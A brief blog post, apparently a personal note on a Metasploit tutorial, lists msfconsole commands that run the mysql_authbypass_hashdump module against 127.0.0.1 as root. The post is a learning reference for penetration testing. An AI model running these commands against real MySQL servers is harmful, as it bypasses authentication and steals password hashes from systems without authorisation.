junho 11th, 2012
msfconsole
Posted by
Felipe Olivaes in
xalassa
http://www.offensive-security.com/metasploit-unleashed/Msfconsole
$ msfconsole
msf > use auxiliary/scanner/mysql/mysql_authbypass_hashdump
msf auxiliary(mysql_authbypass_hashdump) > set USERNAME root
msf auxiliary(mysql_authbypass_hashdump) > set RHOSTS 127.0.0.1
msf auxiliary(mysql_authbypass_hashdump) > run